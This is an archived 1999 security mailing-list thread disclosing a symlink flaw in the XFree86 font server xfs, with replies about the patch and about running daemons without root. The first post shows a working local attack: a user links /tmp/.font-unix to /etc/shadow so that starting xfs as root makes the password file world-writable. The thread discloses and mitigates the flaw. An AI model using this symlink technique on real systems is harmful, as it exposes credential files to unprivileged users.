`Bug in xfs
Lukasz Trabinski ([email protected])
Tue, 30 Mar 1999 00:14:34 +0200
Hello,
I hope that's information will be useful for making new patch for
XFree86.
I found bug in xfs
(Packet XFree86-xfs-3.3.3.1-1 in RedHat 5.1 and probably in RedHat 5.2
updates, too)
Xfs is a font server for XFree86, it's also create directory in /tmp
That directory name .font-unix
Let's make a little check:
On first console (I logged as a normal user)
[lukasz@lt /tmp]$ cat /etc/shadow
cat: /etc/shadow: Permission denied
[lukasz@lt /tmp]$ ls -all /etc/shadow
-r-------- 1 root root 544 Mar 30 00:04 /etc/shadow
[lukasz@lt /tmp]$ ll
total 2
drwxrwxrwt 2 root root 1024 Mar 30 00:05 .
drwxr-xr-x 18 root root 1024 Mar 23 00:10 ..
lrwxrwxrwx 1 lukasz users 11 Mar 30 00:05 .font-unix ->
/etc/shadow
On second console, as root
[root@lt /root]# xfs &
[1] 2021
[root@lt /root]# _FontTransSocketCreateListener: failed to bind listener
_FontTransSocketUNIXCreateListener: ...SocketCreateListener() failed
_FontTransMakeAllCOTSServerListeners: failed to create listener for local
On first console:
[lukasz@lt /tmp]$ ls -all /etc/shadow
-rwxrwxrwt 1 root root 544 Mar 30 00:04 /etc/shadow
^^^^^^^^^^^
That's all ;)
Solution, As root before run xfs, make rm -rf /tmp/.font-unix
Sorry for my broken English ;(
_[ Lukasz Trabinski ]_
PgP Key: finger:[email protected], SysAdmin @wsisiz.edu.pl
-----------------------------------------------------------------------
Re: Bug in xfs
Matthieu Herrb ([email protected])
Wed, 31 Mar 1999 08:04:17 +0200
You wrote (in your message from Tuesday 30)
>
> I hope that's information will be useful for making new patch for
> XFree86.
>
> I found bug in xfs
This is caused by the same bug in xc/lib/xtrans that "in.telnetd"
<[email protected]> reported under the subject "X11R6 NetBSD
Security Problem" last week.
The patch I submitted (with stat() replaced by lstat(), as noted by
Kevin Vajk and other) also fixes that.
--
Matthieu
-----------------------------------------------------------------------
Re: Bug in xfs
Juha Virtanen ([email protected])
Wed, 31 Mar 1999 09:38:28 +0300
Regardless of the bug Lukasz Trabinski found in xfs -- it should
be fixed and similar bugs traced from other software as well --
it is not necessary to run xfs with root permissions at all.
Someone may unknowingly argue that it needs to listen a port.
Yes, but that's usually port 7100, and as it's not under 1024
limit, so root permission isn't needed.
I've run xfs for ages on separate account. below is the
significant startup line I use in RedHat 5.x systems:
daemon /bin/su fontsvr -c "/usr/X11/bin/xfs -config /etc/X11/fs/config -port 7100 &"
The rule is: if a daemon can do its work with lower permissions
than root, it should.
I do also run named as nonroot permissions (Startup
/usr/sbin/named -u user -g group). I recommend other people
doing this as well.
Juha Virtanen
--
<URL:http://www.iki.fi/jiivee/>
-----------------------------------------------------------------------
Re: Bug in xfs
Alan Cox ([email protected])
Wed, 31 Mar 1999 10:25:07 +0100
> I do also run named as nonroot permissions (Startup
> /usr/sbin/named -u user -g group). I recommend other people
> doing this as well.
This isnt one to do blindly as it means named cannot bind to interfaces
that appear dynamically (eg as a DNS cache on a terminal server). The
fact that you end up having to run named as root or with the relevant
capability to allow it to bind to low ports.
Alan
-----------------------------------------------------------------------
Re: Bug in xfs
Roman Drahtmueller ([email protected])
Wed, 31 Mar 1999 05:10:14 +0200
[snip]
> [lukasz@lt /tmp]$ ls -all /etc/shadow
> -r-------- 1 root root 544 Mar 30 00:04 /etc/shadow
[snip]
> [root@lt /root]# xfs &
[snip]
> [lukasz@lt /tmp]$ ls -all /etc/shadow
> -rwxrwxrwt 1 root root 544 Mar 30 00:04 /etc/shadow
[snip]
> Solution, As root before run xfs, make rm -rf /tmp/.font-unix
For sure this needs to be fixed. Your "solution" introduces a race
condition, though, if the font server is started when users are
allowed to log on.
A better interim aid is not to run xfs as root in the first place. In
fact, why would one want to run things as root if not necessary?
Roman.
Computer Center University of Freiburg, Germany.
"The whole world is about three drinks behind." (Humphrey Bogart)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation